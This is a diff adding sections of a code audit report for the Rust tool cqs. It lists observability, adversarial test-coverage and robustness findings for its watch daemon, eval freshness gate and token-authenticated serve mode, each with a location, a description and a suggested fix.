+#### OB-V1.30.1-3: `WatchSnapshot` state transitions are silent — no journal trail for Stale/Fresh/Rebuilding flips
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/mod.rs:149-185` (`publish_watch_snapshot`); `src/watch_status.rs:195-224` (`WatchSnapshot::compute`)
+- **Description:** The watch loop calls `publish_watch_snapshot` every tick (~100 ms). The new snapshot silently overwrites the previous via `*guard = snap`. There is no event when `state` flips Fresh→Stale (a file change actually arrived), Stale→Fresh (drain completed), or Rebuilding→Fresh (HNSW swap landed). Operators running `journalctl --user -u cqs-watch -f` to debug "why does the eval gate think the index is stale?" see nothing — the only signals are info-level events buried in `process_file_changes`/`spawn_hnsw_rebuild`, which fire on internal events but not on the *resolved* freshness verdict. The `idle_secs`/`modified_files` history is also unrecoverable after the fact because the snapshot is overwrite-only.
+- **Suggested fix:** In `publish_watch_snapshot`, compare `prev_state` against `new.state` before the overwrite. On change, emit `tracing::info!(prev = prev.as_str(), next = next.as_str(), modified_files, rebuild_in_flight, dropped_this_cycle, "watch state transition")`. One event per actual change, not per tick. Cardinality is bounded (4×4 - 4 self-edges = 12 transitions max). The reconcile/rebuild call sites can keep their existing detail.
+
+#### OB-V1.30.1-4: `wait_for_fresh` polling loop returns without a closing tracing event recording outcome + elapsed
+- **Difficulty:** easy
+- **Location:** `src/daemon_translate.rs:660-679`
+- **Description:** `wait_for_fresh` opens an `info_span!("wait_for_fresh", wait_secs)` but every return path (Fresh/Timeout/NoDaemon) is silent. The eval gate's failure mode "watch index is still stale after Ns" surfaces an `anyhow::bail!` to the user, but no journal record exists of how long the wait actually was, what the final modified_files count was, or whether the loop exited early on Fresh vs hit deadline. For long waits (`--require-fresh-secs 600`), this is the difference between "I know my agent waited 8 minutes for a 47-file rebuild" and "I have no idea why my run was slow." The 250 ms poll itself is intentionally not logged (would be 2400 events on a 600s wait), but the resolution at exit should be.
+- **Suggested fix:** Add three terminal `tracing::info!`s before each return: `info!(elapsed_ms = start.elapsed().as_millis(), modified_files = snap.modified_files, "wait_for_fresh: index reached Fresh")` for the success path, `info!(elapsed_ms, modified_files = snap.modified_files, pending_notes = snap.pending_notes, rebuild_in_flight = snap.rebuild_in_flight, "wait_for_fresh: timeout — index still stale")` for timeout, and `info!(error = %msg, "wait_for_fresh: daemon unreachable")` for NoDaemon.
+
+#### OB-V1.30.1-5: `enforce_auth` 401 warn lacks rejection reason — three failure modes collapse to one log line
+- **Difficulty:** easy
+- **Location:** `src/serve/auth.rs:389-401`, `src/serve/auth.rs:269-321` (`check_request`)
+- **Description:** The 401 warn (added by P1.21 in v1.30.0) logs `method` + `path` but not *why* the request was rejected. `check_request` has three independent paths that can fail (no `Authorization: Bearer …`, mismatched cookie value, missing/wrong `?token=` query param), and operators investigating "why are clients hitting 401?" can't tell from the journal whether tokens are being sent at all (auth missing) vs sent in the wrong format (auth misconfigured) vs being intercepted/expired (auth replaced). With the `cqs serve` cookie-and-header scheme this matters: a frontend that has the wrong cookie name and no header looks identical in the log to one that's missing auth entirely. `check_request`'s control flow already knows which fallthrough fired; just plumb that out.
+- **Suggested fix:** Change `AuthOutcome::Unauthorized` to carry a low-cardinality reason enum (`MissingAll`, `BearerMismatch`, `CookieMismatch`, `QueryParamMismatch`) — built from which guards fired in `check_request`. Log that as a structured field: `tracing::warn!(method = %req.method(), path = %req.uri().path(), reason = %reason, "serve: rejected unauthenticated request")`. Reason is bounded so cardinality stays safe.
+
+#### OB-V1.30.1-6: `require_fresh_gate` lacks entry span and final-decision info — eval gate decisions invisible in trace
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/eval/mod.rs:219-275`
+- **Description:** `require_fresh_gate` is the central control point for the new `--require-fresh` watch-mode gate (#1182). Two of its decision paths (`--no-require-fresh`, `CQS_EVAL_REQUIRE_FRESH=0`) emit `tracing::info!`, but the unix happy path that actually calls `wait_for_fresh` has no entry span and no completion event. The eval run summary in the journal — the thing an operator searches for to answer "did this run wait? did it skip? did it bail?" — is missing. Compare with `runner::run_eval` which has a full `info_span!("eval_run", query_file = ..., budget = ...)` at entry; the gate that decides whether `run_eval` even fires has no parallel.
+- **Suggested fix:** Wrap the function body in `let _span = tracing::info_span!("require_fresh_gate", wait_secs).entered()`. After `wait_for_fresh` returns, emit a single `tracing::info!(outcome = "fresh"|"timeout"|"no_daemon", elapsed_ms, modified_files, "require_fresh_gate: resolved")` so the result is greppable. Removes the need for the operator to correlate `wait_for_fresh` span output with the bail message in the user's stderr.
+
+#### OB-V1.30.1-7: `daemon_reconcile` walk has no elapsed timing field — reconcile pass duration unrecoverable
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/reconcile.rs:63-148`
+- **Description:** `run_daemon_reconcile` opens `info_span!("daemon_reconcile")` at entry and emits `tracing::info!(queued, added, modified, "Reconcile: queued divergent files for reindex")` at the end, but the duration of the disk walk + diff is never recorded. On large repos with bulk renames this can be multi-second; on WSL with `/mnt/c` it can be tens of seconds. Without `elapsed_ms`, operators can't tell whether reconcile is the cause of a "watch loop missed events" complaint or whether the walk is fast enough to ignore. Same story for `run_daemon_startup_gc` (`src/cli/watch/gc.rs:103-180`) and `run_daemon_periodic_gc` (`:195-243`) — the spans emit counts but not timings.
+- **Suggested fix:** Capture `let start = std::time::Instant::now()` at entry; include `elapsed_ms = start.elapsed().as_millis()` in the terminal `tracing::info!` (or `tracing::debug!` for the no-divergence branch). One field per call, three call sites — small, mechanical. Pattern matches what the embedder/HNSW build sites already do.
+
+#### OB-V1.30.1-8: `daemon_status` connect failure logs at warn during normal startup race — every poll iteration
+- **Difficulty:** medium
+- **Location:** `src/daemon_translate.rs:438-441` (in `daemon_status`), called from `wait_for_fresh` poll loop at `:660-679`
+- **Description:** `daemon_status` calls `tracing::warn!(stage = "connect", error = %e, "daemon_status failed")` whenever `UnixStream::connect` fails. That's fine for one-shot use, but `wait_for_fresh` invokes it in a 250 ms polling loop. If the daemon restart-races a `cqs eval --require-fresh` invocation (e.g. systemctl restart), every 250 ms the loop emits a connect-warn for up to `wait_secs`. A 600s wait could write 2400 warn lines. The connect-failure path also already returns `FreshnessWait::NoDaemon` and exits — but the warn fires before the exit, and on transient mid-poll errors (less common but possible) the warns accumulate. Also affects `daemon_ping` similarly.
+- **Suggested fix:** Move the `tracing::warn!` out of `daemon_status`/`daemon_ping`'s connect-failure closure and into the *caller* that decides whether the failure is fatal. `wait_for_fresh` should own the "this is the final answer" warn; the inner functions should `tracing::debug!` connect failures so polling doesn't paper over the journal. Alternatively, sample the warn (log first + every Nth) — but call-site relocation is the cleaner fix.
+
+#### OB-V1.30.1-9: `process_file_changes` uses `println!` in non-quiet mode — bypasses tracing infrastructure entirely
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/events.rs:147-152`
+- **Description:** When `cfg.quiet` is false, the watch loop prints `\n{} file(s) changed, reindexing...` followed by per-file paths via `println!` — straight to stdout. The systemd unit captures stdout to journal, so this works *technically*, but: (1) it's not a structured event so `journalctl --output=json | jq` can't parse it, (2) it doesn't honour the trace subscriber's filter level, (3) the print is unconditional on `!quiet` even though there's already a separate `tracing::info!` at `:286` in `spawn_hnsw_rebuild` covering the same ground at the right level. A daemon process should never write user-facing UI to stdout — that's reserved for the foreground CLI.
+- **Suggested fix:** Replace the `println!` block with `tracing::info!(file_count = files.len(), files = ?files, "watch: reindexing changed files")`. If the foreground (non-daemon) UX really needs the unstructured print, gate it on a separate `cfg.foreground` flag rather than `!quiet`, since the daemon has no terminal to print to anyway.
+
+#### OB-V1.30.1-10: `serve::search` handler logs full query string at info — matches TraceLayer span and risks query-content leak in journal
+- **Difficulty:** easy
+- **Location:** `src/serve/handlers.rs:189-232`
+- **Description:** `tracing::info!(query = %params.q, limit = params.limit, "serve::search")` at line 193 logs the user's full search query at info level. The TraceLayer span installed by `cqs serve` already records the request URI (with query string redacted per P1.11), so this duplicates that — but at a different layer that doesn't go through the redaction logic. A user search like `serve` getting `?q=AKIA...` (accidentally pasting a credential) writes the credential to the journal verbatim, where the redacted TraceLayer would have sanitized it. Same applies to the `tracing::info!(matches = matches.len(), "search returned")` at line 231 — that one's fine, but the entry log should follow the redaction policy.
+- **Suggested fix:** Either (a) demote the entry log to `tracing::debug!` so it doesn't fire at default level, or (b) log only `q_len = params.q.len()` and `limit` — the matches-returned line at the end carries the per-call diagnostic value. The query content already lives in `query_log` (when enabled) which has its own opt-in surface; the live tracing journal shouldn't double-record it.
+## Test Coverage — adversarial / sad-path
+
+#### TC-ADV-1.30.1-1: `AuthToken::try_from_string` has no upper-bound length check, no length test
+- **Difficulty:** easy
+- **Location:** src/serve/auth.rs:123-129 (production); src/serve/auth.rs:432-473 (tests)
+- **Description:** `try_from_string` only validates the alphabet — it accepts any-length input including multi-megabyte strings. Comment at line 143-147 explicitly says "We do not require the length be exactly 43 … future deterministic tokens may be shorter". There is no `MAX_TOKEN_LEN` cap (verified by `grep MAX_TOKEN_LEN` returning zero hits) and no test pins behavior at extreme lengths. A future env-var-stable-token feature that accidentally reads a binary blob (e.g. `CQS_SERVE_TOKEN=$(cat huge.bin | tr -dc 'A-Za-z0-9_-')`) succeeds, then becomes the value sent through `HeaderValue::from_str` in the Set-Cookie path on every redirect. axum / hyper enforce a header-line cap (~16 KiB by default), so an oversized token silently fails the redirect handoff at runtime instead of failing at construction. The test suite never observes this — boundary inputs (length = 0 verified, length = 1 verified, length = 1 MiB unverified) are not covered.
+- **Suggested fix:** Add an explicit `MAX_TOKEN_LEN` (e.g., 256) constant, reject in `is_valid_token_alphabet`, and add `try_from_string_rejects_overlong_input` exercising 257/4096/1 MiB lengths. If the explicit cap is rejected as policy, at minimum add a test that pins "10 KiB alphabet-valid input is accepted today" so a future cap lands intentionally rather than as a surprise.
+
+#### TC-ADV-1.30.1-2: `check_request` ambiguous-channel collision — cookie + query both present, query wrong, cookie right
+- **Difficulty:** easy
+- **Location:** src/serve/auth.rs:269-321
+- **Description:** Three-channel auth is tested for each channel in isolation, but never for the combination. The function checks Bearer → cookie → query in order and returns `Ok` on the first hit. If a stale `?token=wrong` appears alongside a correct `cqs_token_<port>=right` cookie (e.g., a bookmarked URL whose token has been rotated, but the browser still has the new cookie), the cookie path matches first and the request authenticates as `Ok` — but the redirect handoff that strips the bad query never fires, so the operator's URL bar continues to display a stale leaked token. Tests in `auth_tests` (lines 1480-1505 multi-cookie; 1508+ query) cover each channel singly; none mix wrong-query + right-cookie or right-query + wrong-cookie. The latter is more interesting: with cookie wrong and query right, current code returns `OkViaQueryParam` and overwrites the cookie — correct behavior, but unpinned. A future refactor that swaps order or short-circuits on the first present channel could regress silently.
+- **Suggested fix:** Add `auth_query_wrong_cookie_right_authenticates_via_cookie_no_redirect`, `auth_query_right_cookie_wrong_redirects_and_overwrites_cookie`, and `auth_two_cookies_with_same_name` (RFC 6265 allows duplicates; current code matches the first occurrence — pin that).
+
+#### TC-ADV-1.30.1-3: `check_request` Bearer-prefix grammar gaps — `Bearer<token>`, double-space, lowercase `bearer`
+- **Difficulty:** easy
+- **Location:** src/serve/auth.rs:271-280
+- **Description:** Bearer parsing uses `strip_prefix("Bearer ")` — a single literal space, case-sensitive. Per RFC 6750 §2.1 the scheme is case-insensitive (`Bearer` / `bearer` / `BEARER` all valid) and the BNF allows multiple SP between scheme and credential. There are no tests pinning current strict behavior. Today: `Authorization: bearer <token>` → 401 (treated as no Bearer). `Authorization: Bearer  <token>` (two spaces) → 401 (the leading space ends up in `bearer` value, fails `ct_eq`). `Authorization: Bearer<token>` (no space) → 401. All three are real client behaviors (some HTTP libraries normalize, some don't). A future refactor to use the `headers` crate's `Authorization::<Bearer>` parser would change all three to 200 — silently relaxing auth. No test catches the change in either direction.
+- **Suggested fix:** Add three regression-pin tests asserting current 401 behavior for `bearer ` (lowercase scheme), `Bearer  ` (double-space), and `Bearer<token>` (no separator). Mirror the strip_token_param pattern from P2.30 — comment that the assertion inverts when the SEC fix lands.
+
+#### TC-ADV-1.30.1-4: `wait_for_fresh` — daemon-dies-mid-poll path untested; partial-read / malformed-JSON path untested
+- **Difficulty:** medium
+- **Location:** src/daemon_translate.rs:660-679 (production); 1204-1376 (tests)
+- **Description:** The three existing tests cover (a) fresh on first poll, (b) timeout when daemon stays stale, (c) NoDaemon when socket missing. None of them cover the realistic outage shape: the daemon was up at the first poll but exits between polls. After the listener closes, `daemon_status`'s `UnixStream::connect` returns `ECONNREFUSED` and `wait_for_fresh` collapses to `NoDaemon` — the eval gate then bails with the "watch daemon not reachable" message even though we *just* heard from it. Pin or re-design. Worse, there is no test for malformed-JSON / partial-line responses: if the daemon is mid-write and the connection is interrupted (system load, OOM kill), `read_line` returns a partial JSON line and `serde_json::from_str` fails. `daemon_status` returns the raw serde-json error string `Err("parse envelope failed: ...")` which `wait_for_fresh` then collapses into `NoDaemon`. A user sees "no daemon running" when the daemon is alive but stressed — a misleading diagnostic.
+- **Suggested fix:** Add `wait_for_fresh_returns_no_daemon_when_daemon_exits_mid_poll` (mock listener closes after first response, second poll gets refused). Add `daemon_status_surfaces_distinct_error_for_malformed_response` (mock writes `{"status":"ok","output":` then drops, asserting the error string is distinguishable from "no daemon running"). Optionally introduce a `FreshnessWait::TransportError` variant so the eval gate can give a different hint than "start the daemon".
+
+#### TC-ADV-1.30.1-5: `run_daemon_reconcile` — clock-skew (stored mtime in the future) keeps file out of queue forever
+- **Difficulty:** medium
+- **Location:** src/cli/watch/reconcile.rs:108-132
+- **Description:** Predicate is `disk > stored` (strict). If a file's stored mtime is *in the future* (clock was wrong when index was built — common on WSL after host suspends; common on systems with a battery RTC drifting forward; common when copying an index from a machine in the future timezone via `rsync`), then every subsequent edit produces `disk_mtime < stored_mtime` and reconcile silently skips the file. The watch path through inotify still catches the change, but on `/mnt/c/` (where reconcile is the *only* reliable layer per the module docstring) the file silently stays stale. No test exists. The complementary case in `reconcile_skips_unchanged_files` (line 396) only pins `disk == stored`. The existing `reconcile_detects_bulk_modify_burst` pins the forward direction.
+- **Suggested fix:** Add `reconcile_clock_skew_stored_mtime_in_future_still_drains_eventually` — seed a chunk with `stored_mtime = SystemTime::now() + 1h`, write the file at `now`, then run reconcile and assert one of: (a) the file is queued anyway (bug fix), or (b) the file is *not* queued today (regression-pin). Either way, also add a `tracing::warn!(stored, disk, "reconcile: stored mtime is in the future")` arm in production so journalctl surfaces the corruption.
+
+#### TC-ADV-1.30.1-6: `run_daemon_reconcile` — `metadata()` Err silently maps to "leave to GC", masking permission-denied stale state
+- **Difficulty:** medium
+- **Location:** src/cli/watch/reconcile.rs:116-127
+- **Description:** When `lookup_path.metadata()` fails (EACCES, EPERM, ELOOP from a symlink loop), `disk_mtime = None`. The match arm `(Some(_), None) => false` then says "can't read disk mtime → leave to GC" — but the GC pass (`prune_missing`) only runs `metadata()` to *remove* indexed-but-missing files; it never reindexes a file that exists-but-can't-be-stat'd. So a permission-denied file silently lingers in the index with stale content forever. There is no `tracing::warn!` on this arm — the failure is invisible. Per the v0.12.1 audit lesson, this is exactly the "bare unwrap_or_default swallowing real errors" pattern: not unwrap_or_default literally, but the equivalent — an Err arm that returns a defaulted decision with no log. No test seeds an unreadable file and observes the silent skip.
+- **Suggested fix:** Add `tracing::warn!(error = %e, path = %lookup_path.display(), "reconcile: stat failed")` on the metadata-err arm. Add a Linux-only test that uses `chmod 0` on a parent dir and asserts the warn fires (capture via `tracing_subscriber::test`). Document that the file remains stale until permissions are fixed — or queue it anyway (the reindex path will produce its own clearer error).
+
+#### TC-ADV-1.30.1-7: `env_disables_freshness_gate` test re-implements the function instead of calling it; garbage / whitespace inputs untested through real env
+- **Difficulty:** easy
+- **Location:** src/cli/commands/eval/mod.rs:282-290 (production); 405-432 (test)
+- **Description:** The "test" at line 406 reads:
+    ```rust
+    for (input, expected) in cases {
+        let lower = input.trim().to_ascii_lowercase();
+        let observed = matches!(lower.as_str(), "0" | "false" | "no" | "off");
+        assert_eq!(observed, *expected, ...);
+    }
+    ```
+  This is testing the body of the function inlined, not the function itself. If a future refactor changes `env_disables_freshness_gate` to read a *different* env var, or to flip the falsy list, the test still passes — it never calls the function. Real behavior gaps that a real-call test would surface: (a) `CQS_EVAL_REQUIRE_FRESH=garbage` returns `false` (gate stays on) — fine, but unpinned. (b) `CQS_EVAL_REQUIRE_FRESH=" 0 "` (whitespace-padded) returns `true` (the `.trim()` handles it) — pinned indirectly only. (c) `CQS_EVAL_REQUIRE_FRESH=` (empty) returns `false` — handled by the empty-string match miss, but not pinned. The same comment-block (lines 410-411) admits "We can't safely set/unset a real env var here" — which is true per default, but `serial_test::serial` is already used for `CQS_DAEMON_TIMEOUT_MS`-touching tests in `daemon_translate.rs::tests`, so the pattern exists.
+- **Suggested fix:** Rewrite the test to call `env_disables_freshness_gate()` under `#[serial_test::serial(cqs_eval_require_fresh_env)]`, set/unset the env var per case, save/restore in scope-guard. Cover at minimum: unset, "1", "0", "garbage", "  off  ", "" (empty string). Apply the same `unsafe` env-var save/restore pattern used by `reconcile_enabled_default_true`.
+
+#### TC-ADV-1.30.1-8: `WatchSnapshot::compute` — `delta_saturated=true` with `pending_files=0`, `rebuild_in_flight=false` reports `Fresh` despite a real correctness flag
+- **Difficulty:** easy
+- **Location:** src/watch_status.rs:199-223
+- **Description:** The state machine considers `pending_files_count`, `pending_notes`, `dropped_this_cycle`, and `rebuild_in_flight`. It does **not** consider `delta_saturated`. Per the field's own docstring (lines 84-87), `delta_saturated == true` means "the rebuilt index is discarded on swap and the next threshold rebuild reads SQLite fresh — operators should know if this is happening repeatedly". Today, after a saturated rebuild swap completes, `rebuild_in_flight` flips to false; if `pending_files_count` happens to be zero on the same tick, the snapshot reports `state == Fresh` while `delta_saturated == true` quietly rides along in JSON. An eval consumer gating on `state == fresh` proceeds; a CLI human reading text output sees "fresh" and never notices. There is no test for `delta_saturated=true` (only the field default of `false` is exercised across all 7 tests).
+- **Suggested fix:** Decide whether `delta_saturated == true` *should* mark `Stale` (it represents recently-discarded incremental work — the index is correct, but the operator should know). Either way, add `compute_delta_saturated_does_not_affect_state_today` as a regression pin, or change the state machine to include it. If the latter, the change is: `else if input.pending_files_count > 0 || input.pending_notes || input.dropped_this_cycle > 0 || input.delta_saturated`.
+
+#### TC-ADV-1.30.1-9: `daemon_status` — non-`ok` envelope with `null`/`number` `message` field returns "daemon error: daemon error" placeholder
+- **Difficulty:** easy
+- **Location:** src/daemon_translate.rs:487-499
+- **Description:** When the daemon returns `{"status":"err","message": null}` or `{"status":"err","message": 42}` or `{"status":"err"}` (no message), the `.and_then(|v| v.as_str()).unwrap_or("daemon error")` fallback produces the literal string `"daemon error: daemon error"` — a debugging black hole. Tests cover happy path (status=ok) and `daemon_status_errors_without_socket` (no socket) but **not** the malformed/missing-message envelope. The `tracing::warn!` on the same arm logs `msg` (which is the placeholder) so journal also shows `msg="daemon error"` — no diagnostic value at all. Per the v0.12.1 audit lesson, this is the canonical "warn-then-default arm not exercised" anti-pattern.
+- **Suggested fix:** Add `daemon_status_handles_err_envelope_with_no_message` and `daemon_status_handles_err_envelope_with_non_string_message` (both return error containing the *shape* of what the daemon sent — at least include the raw JSON, e.g. `format!("daemon error (no message): {envelope}")`).
+
+#### TC-ADV-1.30.1-10: `unwrap_dispatch_payload` accepts a missing `data` field by passing through the wrapper as the payload — no test for "envelope without data"
+- **Difficulty:** easy
+- **Location:** src/daemon_translate.rs:387-404
+- **Description:** Lines 400-402:
+    ```rust
+    match parsed.as_object().and_then(|m| m.get("data")) {
+        Some(data) => Ok(data.clone()),
+        None => Ok(parsed),
+    }
+    ```
+  Comment says "Otherwise pass through (legacy bare-payload mock form)". This means: if the daemon sends `{"version":1,"error":null}` (envelope shape but no `data`), the function returns that wrapper as the WatchSnapshot/PingResponse to deserialize from — `serde_json::from_value::<WatchSnapshot>` fails with "missing field `state`". The user sees an opaque deserialize error. The fall-through-to-wrapper branch is exercised only by the "legacy bare-payload mock" pattern in `daemon_status_mock_round_trip` (which sends real bare data, not a missing-data envelope). A real daemon misbehaviour (envelope present, data missing — e.g., a future refactor that sets data=None on internal error) is conflated with the legacy form. Production WatchSnapshot consumers can't distinguish "daemon spoke wrong protocol" from "daemon's legacy mode".
+- **Suggested fix:** Add `unwrap_dispatch_payload_distinguishes_envelope_no_data_from_bare_form` test: send `{"data": null, "error": "internal", "version": 1}` and assert the function surfaces `error` as the failure rather than passing the whole envelope through. If keeping the legacy fallthrough is intentional, at least gate it on "object that has neither `data` nor `error` nor `version`" so a partial envelope doesn't masquerade as a payload.
+## Robustness
+
+#### RB-1: `to_string_lossy()` on path keys silently mangles non-UTF-8 paths into permanent reindex storms
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/reconcile.rs:99` (key constructor) + `src/store/chunks/staleness.rs:627-637` (DB-side keys came from a different lossy conversion at insert time)
+- **Description:** `run_daemon_reconcile` builds the lookup key for every disk file via `rel.to_string_lossy().replace('\\', "/")` and indexes it against `store.indexed_file_origins()` (a `HashMap<String, _>`). On a path with non-UTF-8 bytes (Windows wide-char surrogate halves, latin-1 squatter byte sequences from foreign filesystems mounted under WSL `/mnt/c/`, or anything dropped on disk by a tool that didn't enforce UTF-8), `to_string_lossy` substitutes `U+FFFD` replacement characters. The DB-side origin string was stored at index time via a different code path (`Chunk::file: PathBuf` → `String` conversion that may have used `to_string_lossy()` *or* `display()` *or* the `path.to_str()` early-return). If the lossy encoding shape disagrees between the two sites — even by one byte — the lookup misses every cycle, the file is forever classified as ADDED, and `pending_files` re-queues it on every periodic reconcile pass (default 30 s). On WSL `/mnt/c/` (the documented worst case for missed events) a single non-UTF-8 file wedges the reconcile loop into a steady-state burn. No tracing, no warning — it looks like the reconcile loop is just doing its job.
+- **Suggested fix:** Skip non-UTF-8 paths up front with a warn. Replace the body of the loop with `let Some(origin) = rel.to_str().map(|s| s.replace('\\', "/")) else { tracing::warn!(path = %rel.display(), "reconcile: skipping non-UTF-8 path"); continue; };` so the encoding shape is exact-match by construction. Same change should land at the indexer side so origins are never inserted with replacement characters, eliminating the disagreement class entirely.
+
+#### RB-2: `wait_for_fresh` panics on `Instant + Duration::from_secs(u64::MAX)` if any non-CLI caller forgets the cap
+- **Difficulty:** easy
+- **Location:** `src/daemon_translate.rs:660-662`
+- **Description:** `pub fn wait_for_fresh(cqs_dir, wait_secs: u64)` does `Instant::now() + Duration::from_secs(wait_secs)`. `Add<Duration> for Instant` panics on overflow per Rust docs. Today every CLI callsite caps at 600 (`eval/mod.rs:237`, `infra/status.rs:63`), but the function is `pub` — any future consumer (an external crate? a new in-tree command? a script forwarding `u64::MAX` as a "wait forever" sentinel?) who skips the cap immediately panics the worker. The cap is enforced by convention, not by the type system. The doc comment even claims "wait_secs (capped at 600 by the caller's clap default — caller is …)" which makes the function's contract caller-dependent.
+- **Suggested fix:** Cap defensively inside the function: `let wait_secs = wait_secs.min(86_400);` (one day is more than any sane caller needs and well below `Instant + Duration` overflow). Or use `Instant::now().checked_add(Duration::from_secs(wait_secs)).unwrap_or_else(|| Instant::now() + Duration::from_secs(86_400))`. The function then satisfies its contract for every u64 input.
+
+#### RB-3: `as_secs() as i64` SystemTime-to-i64 cast pattern landed in 5 new locations post-RB-V1.30-3
+- **Difficulty:** easy
+- **Location:** `src/watch_status.rs:229`, `src/cli/batch/mod.rs:779`, `src/cli/batch/mod.rs:1988`, `src/cli/commands/infra/ping.rs:122`, `src/cli/watch/mod.rs:159`
+- **Description:** RB-V1.30-3 fixed the pattern in `src/cache.rs` only. The same `SystemTime::now().duration_since(UNIX_EPOCH).map(|d| d.as_secs() as i64)` cast (u64 → i64) sits in five more production paths added or untouched in v1.30, all of which silently wrap to negative after year 2554. `watch_status.rs:229` is on the `now_unix_secs()` helper that powers every `WatchSnapshot::compute` call; `cli/watch/mod.rs:159` is the `last_synced_at` value the watch loop publishes on every tick. Latent (the deadline is 528 years out), but the same pattern that motivated the original finding has spread, so the original fix's "Defense-in-depth" rationale applies identically.
+- **Suggested fix:** Hoist a single helper `fn unix_secs_i64() -> Option<i64> { SystemTime::now().duration_since(UNIX_EPOCH).ok().and_then(|d| i64::try_from(d.as_secs()).ok()) }` in `crate::time` (or extend the existing `cache::now_unix_i64`), have all five callsites use it. Eliminates the cast-pattern re-emergence. Bonus: the helper makes "what does the time look like right now?" a single grep target for future audits.
+
+#### RB-4: `as_millis() as i64` cast in reindex pipeline truncates u128 to i64 silently
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/reindex.rs:507-508`
+- **Description:** `t.duration_since(UNIX_EPOCH).ok().and_then(|d| ...).map(|d| d.as_millis() as i64)` casts a `u128` to `i64`. For typical mtimes this fits, but a corrupt or maliciously-crafted file with mtime far in the future (e.g. year-9999 `touch -d` from a tool, or a tar extracted with a wrong epoch) gives `as_millis()` a value beyond `i64::MAX` (= ~year 292,277,000 in milliseconds) — wait, well above any plausible year-9999 corruption. The actual risk: SystemTime can also represent times *before* 1970 if the file was pre-dated (`touch -d 1969-01-01`), in which case `duration_since(UNIX_EPOCH)` returns `Err` and the `.ok()` short-circuits to `None`. So pre-epoch is silently treated as "no mtime" — fine. The real concern is the *u128 → i64 truncation* path: it can produce arbitrary nonsense values (negative, zero, anything) on platforms that report wildly future mtimes through `metadata().modified()`. The reindex pipeline then writes that nonsense into `source_mtime`, and the next reconcile pass uses it for the `disk > stored` comparison.
+- **Suggested fix:** Use `i64::try_from(d.as_millis()).ok()` to surface the overflow as `None` (handled the same way as missing mtime). Defense-in-depth — silently corrupting `source_mtime` for one pathological file class is worse than treating it as unknown.
+
+#### RB-5: `migrate_legacy` sentinel read uses unbounded `fs::read_to_string`
+- **Difficulty:** easy
+- **Location:** `src/slot/mod.rs:656`
+- **Description:** RB-V1.30-2 capped the slot pointer + `slot.toml` reads at `SLOT_POINTER_MAX_BYTES`, but the migration sentinel file (`MIGRATION_SENTINEL_FILE`, written by RB-V1.30-4's fix) is still read via `fs::read_to_string(&sentinel).unwrap_or_default()`. Same OOM class as RB-V1.30-2: a stray editor swap-file collision, corrupt write during the previous mid-flight crash, or hostile co-tenant in `.cqs/` can leave a multi-GB sentinel behind. Every cqs invocation in that project then attempts `read_to_string` at the top of `migrate_legacy_index_to_default_slot` and OOMs before any other recovery action runs — bricking the project on the *recovery path* the previous fix added.
+- **Suggested fix:** Read with a hard cap, mirror the helper RB-V1.30-2's fix introduced. ~64 KiB is plenty for sentinel content (which is the inventory of partially-moved files plus a timestamp and a tracing-style error string). Reuse the same `read_capped` helper if it was extracted; otherwise inline `let mut buf = String::new(); fs::File::open(&sentinel)?.take(64 * 1024).read_to_string(&mut buf)?;` and gracefully degrade the user-facing message on cap-hit ("sentinel file is unreadable / too large; manually rm to retry").
+
+#### RB-6: `enumerate_files` `path.strip_prefix(&root).unwrap_or(&path)` on canonicalize-mismatch silently leaks absolute paths into the relative-path workflow
+- **Difficulty:** medium
+- **Location:** `src/lib.rs:680-685`
+- **Description:** After per-entry canonicalize, `if path.starts_with(&root)` is true → `path.strip_prefix(&root).unwrap_or(&path).to_path_buf()`. The `unwrap_or(&path)` fallback is a code-smell: `starts_with` says yes but `strip_prefix` says no. This shouldn't happen for canonicalized paths from the same canonicalized root, but on case-insensitive filesystems (NTFS/HFS+) `starts_with` does byte comparison — `C:\Projects\cqs` starts_with `C:\Projects\Cqs` is false even though they refer to the same directory. The reverse is also possible: `dunce::canonicalize` on Windows can return paths with different case than the canonicalized root if a junction/symlink is involved. When the fallback fires, an absolute path leaks into the file list, gets stored as the chunk origin, and subsequent reconcile/staleness lookups (which all assume relative paths) miss every match. Symptom: a subset of files perpetually re-indexed every reconcile pass.
+- **Suggested fix:** Replace the `unwrap_or(&path)` with an explicit warn-and-skip: `match path.strip_prefix(&root) { Ok(rel) => Some(rel.to_path_buf()), Err(_) => { tracing::warn!(path = %path.display(), root = %root.display(), "starts_with said yes but strip_prefix failed — case-insensitive fs?"); None } }`. Surfaces the disagreement instead of silently corrupting the index.
+
+#### RB-7: Atomic `as u64` / `as i64` casts in WatchSnapshot trust unbounded `usize` from caller
+- **Difficulty:** easy
+- **Location:** `src/watch_status.rs:213, 217, 218`
+- **Description:** `WatchSnapshot::compute` casts `pending_files_count: usize` → `u64` etc. directly: `modified_files: input.pending_files_count as u64`. On 64-bit platforms (every release target) the cast is widening — fine. On 32-bit (technically still in MSRV scope) it's also widening. The actual issue: `dropped_this_cycle: input.dropped_this_cycle as u64` is a counter that's monotonically incremented in the watch loop. If a long-lived daemon overflows usize::MAX — implausible (~2e10/sec for 8 years on 64-bit) — the subsequent cast to u64 silently misses the overflow. More immediately: the snapshot exposes *all three* counters as `u64` over JSON to clients without any saturating semantics — a JSON consumer that does arithmetic on `modified_files - last_modified_files` to get a delta gets a wrap when the counters reset on daemon restart. Not a panic path; defense-in-depth.
+- **Suggested fix:** Document the wrap semantics on the JSON schema, or use `saturating_cast` (e.g. `u64::try_from(input.pending_files_count).unwrap_or(u64::MAX)`) so over-large values clamp instead of wrapping. Low priority but lowers the surface for "snapshot.modified_files = 0 right after a burst" misdiagnosis.
+
+#### RB-8: `print_text_report::pct` on empty eval set → division by zero / NaN bleed
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/eval/mod.rs:296-309` + the `pct` helper it calls
+- **Description:** `print_text_report` prints `R@1=, R@5=, R@20=` from `report.overall.r_at_5` (and friends), which is computed as a ratio (recall hits / N). If `N == 0` (empty fixture, all queries skipped because none have a `gold_chunk`) the ratio is `0.0 / 0.0 = NaN`. `pct` formats it; `NaN%` shows up in the human-readable output and `null`/`NaN` (depending on serializer) in `--json`. A downstream consumer like the eval-gate workflow sees NaN, branches "is this less than 0.5?", false, says "looks fine", and an empty fixture passes the gate silently. The skipped-count log line at `:308` is the only signal, easy to miss.
